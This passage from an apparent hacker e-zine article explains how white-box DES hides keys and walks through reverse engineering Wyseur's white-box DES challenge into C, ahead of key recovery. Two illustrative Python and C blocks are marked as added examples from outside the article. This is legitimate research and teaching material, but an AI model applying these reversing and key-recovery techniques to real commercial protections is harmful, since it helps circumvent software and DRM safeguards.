    state 2:   *    L(r)    * *    Y(r+1)   * *     R(r)    *
               ************** *************** ***************
                     |                  |           |
                     v                  |           |
                   .....    .--------.  |           |
                   . + .<---|    P   |<-'           |
                   .....    '--------'              |
                    |                               |
                32b '----------------------------------.
                                        |           |  |
                    .-------------------|-----------'  |
                    |               32b v              v 32b
                    |               .-------.       .------.
                    |              /  E-box  \     ( Select )
                    |  32b        '-----------'     '------'
                    |                   |              |
                    v               48b v              v 16b
               ************** ********************* ********
    state 3:   *   L(r+1)   * *       X(r+1)      * *r(r+1)*
               ************** ********************* ********

       With:
           - sK(r) being the subkey of round r
           - X(r) being the output of the E-box of round r-1
           - Y(r) being the output of the SBox of round r-1
           - r(r) being the complementary bits so that X(r) and r(r) is a
             duplication of R(r)

    b) Input and outputs between elementary operations are protected using
       what is called the "internal encodings". These encodings are applied
       to functions implemented as lookup tables.

       Let's take an example. You are chaining f() and g() which means that
       you are calculating the composition g() o f(). Obviously without any
       protection, an attacker can intercept the result of f() at debug
       time (e.g. by putting a breakpoint at the entry of g()).

       Now if you want to protect it, you can generate a random bijection
       h() and replace f() and g() by F() and G() where:

           F() = h() o f()
           G() = g() o h()^-1

       Note: Again this is a mere example, we do not care about the
       {co}domain consideration.

       These functions are evaluated and then expressed as lookup tables.
       Obviously this will not change the output as:

           G() o F() = (g() o h()^-1) o (h() o f())
                     = g() o (h()^-1 o h()) o f()    [associativity]
                     = g() o f()

       But the difference is that intercepting the output of F() doesn't
       give the output of f(). Pretty cool trick, right?

       However I've just written that WB DES implementations were always
       manipulating 96 bits states. Then does it mean that we need lookup
       tables of 2^96 entries? No, this would be troublesome ;> We can use
       the so called "path splitting" technique.

       Consider the example of a 32 bits buffer. To avoid using a huge
       lookup table, you can consider that this buffer is an 8 bits array.
       Each element of the array will then be obfuscated using a
       corresponding 8 bits lookup table as described below:

                *****************************************
                *   IN[0] ||  IN[1] ||  IN[2] ||  IN[3] *
                *****************************************
                      |         |         |         |
                      |         |         |         |
                      v         v         v         v
                  .-------. .-------. .-------. .-------.
                  | 2^8 B | | 2^8 B | | 2^8 B | | 2^8 B |
                  '-------' '-------' '-------' '-------'
                      |         |         |         |
                      |         |         |         |
                      v         v         v         v
                *****************************************
                *  OUT[0] || OUT[1] || OUT[2] || OUT[3] *
                *****************************************

       I took the example of an 8 bits array but I could have used any
       size. Something really important to understand: the smaller the
       lookup table is, the more it will leak us information. Keep it in
       mind.

    c) Do you remember when I said that a WB implementation was the exact
       implementation of the corresponding crypto primitive? Well it's not
       true. Or you could say that I was simplifying things ^_~

       Most of the time (in real life), WB_DES() is a G() o DES() o F()
       where F() and G() are encoding functions. So the first input
       (plaintext) and the last output (ciphertext) may be obfuscated as
       well. This is called an "external encoding" and this is used to
       harden the white-box implementation. Indeed if there were no such
       functions, first & last rounds would be weaker than other rounds.
       This 'academic' protection aims at preventing trivial key recovery
       attacks. A WB implementation without external encoding is said to be
       'naked'.

       In the context of real life protections, it may (or may not) be
       associated with an additional layer to protect the I/O before &
       after the encryption. It would be bad to intercept the plaintext
       once decrypted, right? Commercial protections almost never use
       native implementations for (at least) this reason. Intercepting a
       plaintext is indeed far easier than recovering the encryption key.

       In the WB DES case, common academic designs use affine functions,
       encoded or not.
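
    Items b) and c) above, as an added example (not code from the article
or from any real white-box): two chained byte-wise steps are protected
with one random bijection per lane (path splitting), then wrapped in an
external encoding. f() and g() are constructed stand-ins, and the seeds
and function names are assumptions.

```python
# Added example, not code from the article or from any real white-box.
import random

LANES = 4                              # a 32 bits buffer seen as 4 bytes

def random_bijection(rng):
    perm = list(range(256))
    rng.shuffle(perm)
    return perm

def invert(table):
    inv = [0] * 256
    for x, y in enumerate(table):
        inv[y] = x
    return inv

def compose(outer, inner):
    """Lookup table of outer() o inner()."""
    return [outer[inner[x]] for x in range(256)]

def apply(tables, state):
    """Path splitting: byte i only ever goes through tables[i]."""
    return [t[b] for t, b in zip(tables, state)]

# Constructed stand-ins for two chained steps f() and g().
f = [[(x + 0x11 * (i + 1)) & 0xFF for x in range(256)]
     for i in range(LANES)]
g = [[(((x << 3) | (x >> 5)) & 0xFF) ^ 0xA5 for x in range(256)]
     for _ in range(LANES)]

def internal_encode(f_tables, g_tables, seed):
    """F_i = h_i o f_i and G_i = g_i o h_i^-1, one random h_i per lane."""
    rng = random.Random(seed)
    F, G = [], []
    for fi, gi in zip(f_tables, g_tables):
        h = random_bijection(rng)
        F.append(compose(h, fi))
        G.append(compose(gi, invert(h)))
    return F, G

def external_encode(F, G, seed):
    """Wrap the chain as out_enc o (G o F) o in_enc. Returns the new
    tables plus the two encodings the other side has to know."""
    rng = random.Random(seed)
    in_enc = [random_bijection(rng) for _ in range(LANES)]
    out_enc = [random_bijection(rng) for _ in range(LANES)]
    F_ext = [compose(Fi, e) for Fi, e in zip(F, in_enc)]
    G_ext = [compose(e, Gi) for Gi, e in zip(G, out_enc)]
    return F_ext, G_ext, in_enc, out_enc

def run_naked(state):
    """g() o f() without any protection."""
    return apply(g, apply(f, state))

if __name__ == "__main__":
    state = [0x13, 0x37, 0xC0, 0xDE]   # constructed input
    F, G = internal_encode(f, g, 2012)
    print(apply(f, state), apply(F, state))       # intermediate differs
    print(run_naked(state), apply(G, apply(F, state)))  # output is equal
    F_ext, G_ext, in_enc, out_enc = external_encode(F, G, 68)
    print(apply(G_ext, apply(F_ext, state)))      # no longer compatible
```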


                         Transforming DES functions
                         --------------------------


    Now that we've had an overview of how I/O were protected between
elementary functions, let's see how we can build said functions.

    a) The partial evaluation

    This is probably the most intuitive part of the WB implementation. This
is about 'fusing' the S-Boxes with the round-keys. This is exactly what was
performed in the previous AES challenge. If you can remember, this is also
the first example that I gave at the beginning of the paper to introduce
the white-boxing concept.

    Using the previous diagram, it means that we want to convert this step:

                    32b               48b              16b
               ************** ********************* ********
               *     L(r)   * *       X(r)        * * r(r) *
               ************** ********************* ********
                      |               |      |         |
                      |               v      |         |
                      |   ******    .....    |         v
                      |   * sK *--> . + .    |    .-------.
                      |   ******    .....    '-->(  Merge  )
                      |               |           '-------'
                      |               v               |
                      |        .-------------.        |
                      |         \     S     /         |
                      |          '---------'          |
                      |               |               |
                32b   v               v 32b     32b   v
               ************** *************** **************
               *    L(r)    * *    Y(r+1)   * *    R(r)    *
               ************** *************** **************

    into this one:


               *********************************************
               *          state 1 (12 x 8 = 96 bits)       *
               *********************************************
                  |      |      |                       |
                  v      v      v                       v
               .-----..-----..-----.                 .-----.
               | T0  || T1  || T2  |       ...       | T11 |
               '-----''-----''-----'                 '-----'
                  |      |      |                       |
                  v      v      v                       v
               *********************************************
               *              state 2 (96 bits)            *
               *********************************************


    A lookup table Ti (mapping a byte to a byte) is called a 'T-Box'. There
    are two types of T-Box because of the heterogeneity of the operations
    performed on the state:

       - The non neutral T-box. They are the 8 T-boxes involved with the
         Sbox and the XOR. Each of them is concealing an Sbox and a subkey
         mixing.

             input:
                      -> 6 bits from X(r) to be mixed with the subkey
                      -> 1 bit from L(r) or r(r)
                      -> 1 bit from L(r) or r(r)
             output:
                      -> 4 bits from the Sbox
                      -> 2 bits from X(r) taken from the input before being
                         mixed with the subkey
                      -> 1 bit from L(r) or r(r)
                      -> 1 bit from L(r) or r(r)

       - The neutral T-box which are only used to connect bits of state 1
         to bits of state 2. For example the bits of L(r) are never
         involved in any operation between state 1 and state 2.

             input:
                      -> 1 bit from L(r) or r(r)
                      -> 1 bit from L(r) or r(r)
                        [...]
                      -> 1 bit from L(r) or r(r)
             output:
                      -> the input (permuted)

    Keep in mind that in each case, you have a 'nibble view' of both inputs
    and outputs. Moreover, permutations are used to make the localization
    of the Sboxes harder upon a simple observation. To have a better
    understanding of this point as well as associated security explanations
    I recommend reading [R09].

    b) The AT transformation

    We now want to transform this:


               ************** *************** ***************
    state 2:   *    L(r)    * *    Y(r+1)   * *     R(r)    *
               ************** *************** ***************
                     |                  |           |
                     v                  |           |
                   .....    .--------.  |           |
                   . + .<---|    P   |<-'           |
                   .....    '--------'              |
                    |                               |
                32b '----------------------------------.
                                        |           |  |
                    .-------------------|-----------'  |
                    |               32b v              v 32b
                    |               .-------.       .------.
                    |              /  E-box  \     ( Select )
                    |  32b        '-----------'     '------'
                    |                   |              |
                    v               48b v              v 16b
               ************** ********************* ********
    state 3:   *   L(r+1)   * *       X(r+1)      * *r(r+1)*
               ************** ********************* ********

    into this:

               *********************************************
               *              state 2 (96 bits)            *
               *********************************************
                  |      |      |                       |
                  v      v      v          ...          v

               ?????????????????????????????????????????????

                  |      |      |          ...          |
                  v      v      v                       v
               *********************************************
               *              state 3 (96 bits)            *
               *********************************************


    To put it simply, and as said earlier, the combination of the P-Box and
the following XOR is an affine function. Because we want to use lookup
tables to implement it we will have to use a matrix decomposition.

    Let's take an example. You want to protect an 8x8 bit-matrix
multiplication. This matrix (M) can be divided into 16 2x2 submatrices as
shown below:

           .----.     .----.----.----.----.     .----.
           | Y0 |     | A  | B  | C  | D  |     | X0 |
           .----.     .----.----.----.----.     '----'
           | Y1 |     | E  | F  | G  | H  |     | X1 |
           .----.  =  .----.----.----.----.  x  .----.
           | Y2 |     | I  | J  | K  | L  |     | X2 |
           .----.     .----.----.----.----.     .----.
           | Y3 |     | M  | N  | O  | P  |     | X3 |
           '----'     '----'----'----'----'     '----'

          Vector Y          Matrix M           Vector X

    Here the Yi and Xi are 2-bit sub-vectors while A, B, C, etc. are 2x2
bit-submatrices. Let's focus on Y0; you can write:

    Y0 = A*X0 [+] B*X1 [+] C*X2 [+] D*X3

    Because A,B,C and D are constants it's possible to evaluate the
multiplications and build the corresponding lookup tables (Li). This gives
the following diagram:

            ******    ******    ******    ******
            * X0 *    * X1 *    * X2 *    * X3 *
            ******    ******    ******    ******
              |          |         |         |
              v          v         v         v
            .----.    .----.    .----.    .----.
            | L0 |    | L1 |    | L3 |    | L4 |
            '----'    '----'    '----'    '----'
               |         |         |         |
               |  .....  |         |  .....  |
               '->. + .<-'         '->. + .<-'
                  .....               .....
                    |                   |
                    |       .....       |
                    '------>. + .<------'
                            .....
                              |
                              v
                            ******
                            * Y0 *
                            ******

    You may object (and you would be right) that information is still
leaking and that it would be easy to retrieve the original matrix. Well
it's true. Thus to avoid this kind of situation two techniques are used:

    - Each XOR operation is hidden inside a lookup table. In our example,
      the resulting lookup tables have 2^(2x2) = 16 entries and 2^2 = 4
      outputs (hence a size of 4x16 = 64 bits).

    - Internal encoding (remember the previous explanations) is used to
      protect the I/O between the lookup tables.

    Our matrix multiplication becomes:

     ******  ******    ******  ******
     * X0 *  * X1 *    * X2 *  * X3 *
     ******  ******    ******  ******

        |      |          |       |
        v      v          v       v

        2b    2b          2b     2b
      <----><---->      <----><---->
      .----------.      .----------.
       \   S0   /        \   S1   /
        '------'          '------'
         <---->            <---->
           2b                2b

                \         /
                 \       /
                  |     |
                  v     v

                  2b    2b
                <----><---->
                 .---------.
                 \   S2   /
                  '------'
                   <---->
                     2b

                      |
                      v

                   ******
                   * Y0 *
                   ******

    This is called an 'encoded network'. The main side effect of this
construction is the large number of lookup tables required.
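
    The construction above can be checked end to end. The following C is
an added example, not code from the article or from the challenge: the
matrix M, the 2-bit encodings F0/F1 and all function names are constructed
for illustration, and the output Y0 is left unencoded.

```c
#include <stdint.h>
#include <stdio.h>

/* Constructed 8x8 bit-matrix M: one byte per row, column 0 in bit 7. */
static const uint8_t M[8] = { 0xB5, 0x6E, 0x93, 0x2D, 0xC7, 0x58, 0xE1, 0x3A };

/* Constructed internal encodings: two bijections on 2-bit values. */
static const uint8_t F0[4] = { 2, 0, 3, 1 };
static const uint8_t F1[4] = { 1, 3, 0, 2 };

static uint8_t S0[16], S1[16], S2[16];      /* the encoded network */

static unsigned parity(unsigned v)
{
    v ^= v >> 4; v ^= v >> 2; v ^= v >> 1;
    return v & 1u;
}

/* Reference: Y = M * X over GF(2); row r of Y lands in bit 7-r. */
uint8_t mul_direct(uint8_t x)
{
    unsigned y = 0;
    for (int r = 0; r < 8; r++)
        y |= parity((unsigned)(M[r] & x)) << (7 - r);
    return (uint8_t)y;
}

/* 2x2 block (block-row 0, block-column j) times the 2-bit sub-vector xj. */
static unsigned block_mul(int j, unsigned xj)
{
    unsigned row0 = (M[0] >> (6 - 2 * j)) & 3u;
    unsigned row1 = (M[1] >> (6 - 2 * j)) & 3u;
    return (parity(row0 & xj) << 1) | parity(row1 & xj);
}

/* First diagram: four plain tables (one per Xj) and visible XORs. */
uint8_t y0_plain_tables(uint8_t x)
{
    unsigned y0 = 0;
    for (int j = 0; j < 4; j++)
        y0 ^= block_mul(j, (x >> (6 - 2 * j)) & 3u);
    return (uint8_t)y0;
}

/* Second diagram: XORs folded into tables, I/O between tables encoded. */
void build_network(void)
{
    uint8_t inv0[4], inv1[4];
    for (int v = 0; v < 4; v++) {
        inv0[F0[v]] = (uint8_t)v;
        inv1[F1[v]] = (uint8_t)v;
    }
    for (unsigned a = 0; a < 4; a++)
        for (unsigned b = 0; b < 4; b++) {
            unsigned idx = (a << 2) | b;
            S0[idx] = F0[block_mul(0, a) ^ block_mul(1, b)]; /* F0(A*X0 [+] B*X1) */
            S1[idx] = F1[block_mul(2, a) ^ block_mul(3, b)]; /* F1(C*X2 [+] D*X3) */
            S2[idx] = (uint8_t)(inv0[a] ^ inv1[b]);          /* decode, then XOR  */
        }
}

uint8_t y0_network(uint8_t x)
{
    unsigned t0 = S0[x >> 4];       /* encoded A*X0 [+] B*X1, index (X0,X1) */
    unsigned t1 = S1[x & 0x0F];     /* encoded C*X2 [+] D*X3, index (X2,X3) */
    return S2[(t0 << 2) | t1];
}

/* 1 if both table-based versions yield Y0 for every possible X. */
int network_matches_matrix(void)
{
    build_network();
    for (int x = 0; x < 256; x++)
        if (y0_network((uint8_t)x) != (mul_direct((uint8_t)x) >> 6) ||
            y0_plain_tables((uint8_t)x) != (mul_direct((uint8_t)x) >> 6))
            return 0;
    return 1;
}

int main(void)
{
    printf("network == matrix for all X: %d\n", network_matches_matrix());
    printf("X=0xff -> Y0=%u (direct %u)\n",
           (unsigned)y0_network(0xff), (unsigned)(mul_direct(0xff) >> 6));
    return 0;
}
```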


--[ 6 - Breaking the second case: Wyseur's challenge


----[ 6.1 - Reverse engineering of the binary


    As far as I can tell, there is an obvious need to rewrite the binary as
C code because:

        - We need to understand exactly what's going on from a mathematical
          point of view and C is more suitable than ASM for that purpose

        - Rewriting the functions will allow us to manipulate them easily
          with our tools. This is not mandatory though because we could
          be using debugging functions on the original binary itself.

    Again I won't detail the whole reverse engineering process because this
is neither the main topic nor very hard anyway compared to what you may
find in the wild (in commercial protections).


                           High level overview
                           --------------------


    Let's begin by running the executable:

---------------------------------------------------------------------------
$ ./wbDES.orig
Usage: ./wbDES.orig <INPUT>
Where <INPUT> is an 8-byte hexadecimal representation of the input to be
encrypted
Example: ./wbDES.orig 12 32 e7 d3 0f f1 29 b3
---------------------------------------------------------------------------

    OK so we need to provide the 8 bytes of the plaintext as separate
arguments in the command line. Hum, weird but OK. When the binary is
executed, the first thing performed is a conversion of the arguments
because obviously a suitable buffer for cryptographic operations is
necessary. The corresponding instructions were rewritten as the following
C function:

---------------------------------------------------------------------------
// I even emulated a bug, will you find it? ;>
inline void convert_args(char **argv)
{
    int i = 0;                  // ebp-50h

    while(i <= 7)
    {
        char c;
        c = argv[1+i][0];

        if(c <= '9')
        {
            c -= '0';          // 0x30 = integer offset in ASCII table
            in[i] = (c<<4);
        }
        else
        {
            c -= ('a' - 10);
            in[i] = (c<<4);
        }

        c = argv[1+i][1];

        if(c <= '9')
        {
            c -= '0';        // 0x30 = integer offset in ASCII table
            in[i] ^= c;
        }
        else
        {
            c -= ('a' - 10);
            in[i] ^= c;
        }
        i++;
    }
    return;
}
---------------------------------------------------------------------------

    Once the job is done, an 8 bytes buffer (in[8], the plaintext) is
built. This is where serious business begins. Thanks to the Control Flow
Graph provided by your favorite disassembler, you will quickly identify 3
pseudo functions* :

    - wb_init(): 0x0804863F to 0x08048C1D

      This code takes an 8 bytes buffer, returns 1 byte and is called 12
      times by main(). Thanks to this, a 12 x 8 = 96 bits buffer is built.
      As said earlier, the WB is operating on 96 bits states so this is
      most likely the initialization function.

    - wb_round(): 0x08048C65 to 0x08049731

      This code takes the 12 bytes buffer generated by wb_init() as input
      and modifies it. The function is called 16 times by main(). Because
      16 is exactly the number of DES rounds, assuming it is the round
      function seems fair.

    - wb_final(): 0x08049765 to 0x08049E67

      This code takes the last buffer returned by wb_round() as input and
      returns an 8 bytes buffer which is printed on the screen. So we can
      assume that this is the termination function in charge of building
      the DES ciphertext out of the last internal state.

*: There is no 'function' in this program, probably because of inlining,
but we can still distinguish logical parts.

    You may argue that attributing roles to wb_init, wb_round and wb_final
is a bit hasty but there is something interesting in the code: symbols! In
each of these functions, an array of lookup tables is used and named
'Initialize', 'RoundAffineNetwork' and 'FinalRoundNetwork' in the
corresponding functions. Convenient isn't it?

    Usually in commercial protections, engineers will take care of little
details such as this and try to avoid leaking any information. In this case
however, it can be assumed that the focus is on the cryptography as there
are neither anti-debugs nor anti-disassembling protections so it should be
safe to trust our intuition.

    Thanks to this first reverse engineering step, we're able to rewrite
a similar main function:

-------------------------------- wb_main.c --------------------------------
unsigned char in[8];            // ebp-1Ch
unsigned char out[12];          // ebp-28h
unsigned char temp[12];         // ebp-34h

[...]

int main(int argc, char **argv)
{
    if( argc != 9)
    {
        printf(usage, argv[0], argv[0]);
        return 0;
    }

    /* Fill the in buffer */

    convert_args(argv);

    /* and print it :) */

    printf("\nINPUT:    ");
    for(j=0; j<8; j++)
        printf("%02x ", in[j]);

    /* WB initialisation */

    for(j=0; j<12; j++)
        wb_init(j);

    round_nbr = 0;
    for(round_nbr=0; round_nbr<15; round_nbr++)
    {
        memcpy(temp, out, 12);
        wb_round();
    }

    /* Building the final buffer */

    printf("\nOUTPUT:   ");
    for(j=0; j<8; j++)
        wb_final(j);

    printf("\n");
    return 0;
}
-------------------------------- wb_main.c --------------------------------

    One hint to speed up things: always focus first on the size and nature
of buffers transmitted to the different sub-functions.


                            Reversing wb_init()
                            -------------------


    It is now time to have a look at the first function. Again I won't
detail the whole reverse engineering but rather give you a few
explanations:

    - Whenever the function is called, it uses a set of 15 lookup tables
      whose addresses depend on both the index in the output array
      and the index of the box itself (amongst the 15 used by the
      function).

      This means that the sets of tables used to calculate OUT[x] and
      OUT[y] when x!=y are (likely to be) different and for a same OUT[x],
      different tables will be applied to IN[a] and IN[b] if a!=b.

    - All of these lookup tables are located at:

          Initialize + 256*idx_box + OUT_idx*0xF00
          where:
              > idx_box is the index of the box amongst the 15
              > OUT_idx is the index in the output array (OUT)

    - The tables are static. Thanks to this property we can dump them
      whenever we want. I chose to write a little GDB script (available in
      appendix) to perform this task. The export is an array of lookup
      tables (iBOX_i) written in C language.

    - wb_init() is performing operations on nibbles (4 bits) so for a
      particular output byte (OUT[m]), the generation of the 4 least
      significant bits is independent of the generation of the 4 most
      significant ones.

    Now with this information in mind, let's have a look at the reversed
wb_init() function:

-------------------------------- wb_init.c --------------------------------
unsigned char p[8];

inline void wb_init(
    int m       // ebp-48h
)
{
    unsigned int temp0; // ebp-228h
    unsigned int temp1; // ebp-224h
    [...]
    unsigned int temp23; // ebp-1CCh

    unsigned int eax,ebx,ecx,edx,edi,esi;

    bzero(p,sizeof p);
    p[0] = iBOX_0[m][in[0]];
    p[1] = iBOX_1[m][in[1]];
    p[2] = iBOX_2[m][in[2]];
    p[3] = iBOX_3[m][in[3]];
    p[4] = iBOX_4[m][in[4]];
    p[5] = iBOX_5[m][in[5]];
    p[6] = iBOX_6[m][in[6]];
    p[7] = iBOX_7[m][in[7]];

    // First nibble

    ecx = (0xF0 & p[0]) ^ ( p[1] >> 4 );
    temp3 = 0xF0 & iBOX_8[m][ecx];

    ecx = (0xF0 & p[2]) ^ ( p[3] >> 4 );
    eax = iBOX_9[m][ecx] >> 4;
    ecx = temp3 ^ eax;
    temp6 = 0xF0 & iBOX_12[m][ecx];

    ecx = (0xF0 & p[4]) ^ ( p[5] >> 4 );
    eax = iBOX_10[m][ecx] >> 4;
    ecx = temp6 ^ eax;
    edi = 0xF0 & iBOX_13[m][ecx];

    ecx = (0xF0 & p[6]) ^ ( p[7] >> 4 );
    eax = iBOX_11[m][ecx] >> 4;
    ecx = edi ^ eax;
    edx = iBOX_14[m][ecx];
    esi = edx & 0xFFFFFFF0;

    // Second nibble

    ecx = (0x0F & p[1]) ^ (0xF0 & ( p[0] << 4 ));
    temp15 = 0xF0 & ( iBOX_8[m][ecx] << 4);

    ecx = (0x0F & p[3]) ^ (0xF0 & ( p[2] << 4 ));
    eax = 0x0F & ( iBOX_9[m][ecx] );
    ecx = temp15 ^ eax;
    temp18 = 0xF0 & ( iBOX_12[m][ecx] << 4 );

    ecx = (0x0F & p[5]) ^ (0xF0 & ( p[4] << 4 ));
    eax = 0x0F & iBOX_10[m][ecx];
    ecx = temp18 ^ eax;
    temp21 = 0xF0 & (iBOX_13[m][ecx] << 4);

    ecx = (0x0F & p[7]) ^ (0xF0 & ( p[6] << 4 ));
    eax = 0x0F & ( iBOX_11[m][ecx] );
    ecx = temp21 ^ eax;
    eax = 0x0F & ( iBOX_14[m][ecx] );

    // Output is the combination of both nibbles

    eax = eax ^ esi;
    out[m] = (char)eax;
    return;
}
-------------------------------- wb_init.c --------------------------------

    In a nutshell:
        - & (AND) and >>/<< (SHIFTS) are used to operate on nibbles
        - ^ (XOR) are used to concatenate nibbles in order to build the
          entries (which are bytes) of the iBOX_i lookup tables
        - The output byte out[m] is the concatenation of two independently
          calculated nibbles

    To understand exactly what's going on, a drawing is much clearer. So
thanks to asciio [R11] this gives us something like this:


 ******** ********  ******** ********  ******** ********  ******** ********
 * IN_0 * * IN_1 *  * IN_2 * * IN_3 *  * IN_4 * * IN_5 *  * IN_6 * * IN_7 *
 ******** ********  ******** ********  ******** ********  ******** ********

    |        |          |       |          |       |          |        |
  H |      H |        H |     H |        H |     H |        H |      H |
    v        v          v       v          v       v          v        v

 <----------------------------- 8x8 = 64 bits --------------------------->

.-------..-------. .-------..-------. .-------..-------. .-------..-------.
\iBox_0 /\iBox_1 / \iBox_2 /\iBox_3 / \iBox_4 /\iBox_5 / \iBox_6 /\iBox_7 /
 '-----'  '-----'   '-----'  '-----'   '-----'  '-----'   '-----'  '-----'

  <----------------------------- 8x4 = 32 bits ------------------------->

    \        /         \        /         \        /          \       /
   H \      / H       H \      / H       H \      / H        H \     / H
      v    v             v    v             v    v              v   v
   .---------.         .---------.        .---------.        .---------.
   \ iBox_8  /         \ iBox_9  /        \ iBox_10 /        \ iBox_11 /
    '-------'           '-------'          '-------'          '-------'

     <------------------------- 4x4 = 16 bits ---------------------->

          \              /                       \             /
        H  \            /  H                   H  \           /  H
            \          /                           \         /
             v        v                             v       v
             .---------.                           .---------.
             \ iBox_12 /                           \ iBox_13 /
              '-------'                             '-------'

                <--------------- 2x4 = 8 bits ----------->

                     \                               /
                      \    H                  H     /
                       '---------.       .---------'
                                 |       |
                                 v       v
                                .---------.
                                \ iBox_14 /
                                 '-------'

                               <- 1x4 bits ->

                                     \
                                    H \           8 bits
                                       \       <--------->
                   Concatenation        '--->  ***********
                    of nibbles                 *  OUT_x  *
                                        .--->  ***********
                                       /
                                    L /
                                     /

                               <- 1x4 bits ->

                                 .-------.
                                / iBox_14 \
                                '---------'
                                ^        ^
                          L     |        |    L
                       .--------'        '--------.
                      /                            \
                     /                              \

                <--------------- 2x4 = 8 bits ----------->

              .-------.                             .-------.
             / iBox_12 \                           / iBox_13 \
             '---------'                           '---------'

             ^        ^                             ^       ^
            /          \                           /         \
        L  /            \  L                   L  /           \ L
          /              \                       /             \

     <------------------------- 4x4 = 16 bits ---------------------->

    .-------.           .-------.          .-------.          .-------.
   / iBox_8  \         / iBox_9  \        / iBox_10 \        / iBox_11 \
   '---------'         '---------'        '---------'        '---------'

      ^    ^             ^    ^             ^    ^              ^   ^
   L /      \ L       L /      \ L       L /      \ L        L /     \ L
    /        \         /        \         /        \          /       \

  <----------------------------- 8x4 = 32 bits ------------------------->

 .-----.  .-----.   .-----.  .-----.   .-----.  .-----.   .-----.  .-----.
/iBox_0 \/iBox_1 \ /iBox_2 \/iBox_3 \ /iBox_4 \/iBox_5 \ /iBox_6 \/iBox_7 \
'-------''-------' '-------''-------' '-------''-------' '-------''-------'

<----------------------------- 8x8 = 64 bits --------------------------->

    ^        ^          ^       ^          ^       ^          ^        ^
  L |      L |        L |     L |        L |     L |        L |      L |
    |        |          |       |          |       |          |        |

 ******** ********  ******** ********  ******** ********  ******** ********
 * IN_0 * * IN_1 *  * IN_2 * * IN_3 *  * IN_4 * * IN_5 *  * IN_6 * * IN_7 *
 ******** ********  ******** ********  ******** ********  ******** ********

    In this case, 'H' is used as a suffix to identify the most significant
(High) nibble of a particular byte. As you can see, the input (respectively
the output) is not an 8 (respectively 12) _bytes_ array but rather a 16
(respectively 24) _nibbles_ array. Indeed, each byte array (iBox_i) stores
exactly 2 lookup tables. We say that such lookup tables are 'compacted',
see [R14] for additional details.


                            Global description
                            -------------------


    Good news guys, the wb_init(), wb_round() and wb_final() functions are
composed of the same nibble oriented patterns. So basically wb_round() and
wb_final() also contain AT applied to a nibble array and the end of the
reverse engineering is quite straightforward.

Remark: Manipulating nibbles implies that the internal encoding is
performed using 4 bits to 4 bits bijections.

    Again thanks to asciio, we're able to draw something like that:


                   8 x (2x4) = 64 bits
          <---------------------------------->

           2x4 = 8 bits
             <---->

          .----------------------------------.             .-----------.
          | .-----. .-----.          .-----. |             |   INPUT   |
       .----| IN0 | | IN1 |   ...    | IN7 | |             '-----------'
       |  | '-----' '-----'          '-----' |                    |
       v  '------------|----------------|----'                    v
       |               v                |                  .------------.
       |--------<---------------<-------'                 ( wb_init func )
       |                                                   '------------'
 .-----v---------------------------------------------.            |
 |.--------. .--------.                   .---------.|            |
 || STG0_0 | | STG0_1 |       ...         | STG0_11 ||            |
 |'--------' '--------'                   '---------'|            |
 '-----|---------|-----------------------------|-----'            |
       |         |                             |                  v
       |         v                             |           .-------------.
       |         |                             |          ( wb_round func )
       '--->-----|-------<---------------------'           '-------------'
                 |                                                |
 .---------------|------------------------------------.           |
 |.--------. .---v----.                    .---------.|           |
 || STG1_0 | | STG1_1 |       ...          | STG1_11 ||           |
 |'--------' '--------'                    '---------'|           |
 '----------------------------------------------------'           |
                                                                  |
    2x4bits                                                       |
  <-------->      12 x (2x4) = 96 bits                            |
 <---------------------------------------------------->           |
                                                                  v
                                                           .-------------.
                              ...                     15x ( wb_round func )
                                                           '-------------'
 .----------------------------------------------------.           |
 |.---------..---------.                  .----------.|           |
 || STG14_0 || STG14_1 |      ...         | STG14_11 ||           |
 |'---------''---------'                  '----------'|           |
 '-----|--------|-------------------------------|-----'           v
       |        v                               |          .-------------.
       |        |                               |         ( wb_final func )
       '----->-----<----------------------------'          '-------------'
                |                                                 |
          .-----|----------------------------.                    v
          |.----v-. .------.         .------.|              .----------.
          || OUT0 | | OUT1 |   ...   | OUT7 ||              |  OUTPUT  |
          |'------' '------'         '------'|              '----------'
          '----------------------------------'

           2x4bits
           <------>
                      8 x (2x4) = 64 bits
          <---------------------------------->


    Writing the C code corresponding to these functions is not difficult
though a bit boring (not to mention prone to mistakes). I was able to
rewrite the whole binary in a few hours (and it took me almost the same
time to make it work :O). The source code is available in the appendix.

Remark: I've not tried to use Hex-Rays on the binary but it could be
interesting to know if the decompilation is working out of the box.

    It's easy to see that my source code is functionally equivalent on the
input/output behavior:

---------------------------------------------------------------------------
$ ./wbDES.orig 11 22 ff dd 00 11 26 93           <- the original

INPUT:    11 22 ff dd 00 11 26 93
OUTPUT:   04 e9 ff 8e 2e 98 6c 6b
$ make
$ ./wbdes.try 11 22 ff dd 00 11 26 93            <- my copy :)

INPUT:    11 22 ff dd 00 11 26 93
OUTPUT:   04 e9 ff 8e 2e 98 6c 6b
$
---------------------------------------------------------------------------

    Now let's try to break the white-box. We will proceed in two steps
which is exactly how I handled the challenge. What is described is how I
proceeded as I wasn't following academic publications. I don't know if it's
a better approach or not. It's just my way of doing things and because I'm
not a cryptographer, it's _practical_. If you prefer more _theoretical_
solutions, please refer to [R04] for a list of papers dealing with the
subject.


----[ 6.2 - The discovery step


    First of all, let's gather some information about this white-box. There
is a first immediate observation: there is no explicit T-box step which
proves that it is combined with the AT step in the same function. This is an
optimization which was historically proposed in [R14] in order to protect
the output of the T-box and, as a result, to mitigate the so-called
statistical bucketing attack described in [R09] while compressing the
implementation by merging operations.

    I used this information as well as the size of the binary (which is a
bit more than the size of the lookup tables) as indicators of how recent
the design could be. I didn't have the time to read all the white-box
related papers (although there are not a thousand of them).


                          Analyzing the wb_init()
                          -----------------------


    Earlier, I've made assumptions about wb_init() and wb_round() but at
this point little is really known about them. Now is the time to play a bit
with wb_init() and by playing I mean discovering the "link" between the
input (plaintext) and the input of wb_round() which will be called "stage0"
from now on.

    Let's begin with a quick observation. As said before, for each output
byte of wb_init(), there is a corresponding set of 14 (condensed) iBox_i.
A simple glance at these boxes is enough to determine that for each set,
the first 8 iBox_i have a very low entropy. Conversely, the remaining 5
have a high entropy:

---------------------------------------------------------------------------
[...]

unsigned char iBOX_3[12][256] = {
{
 0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,
 0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,
 0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,
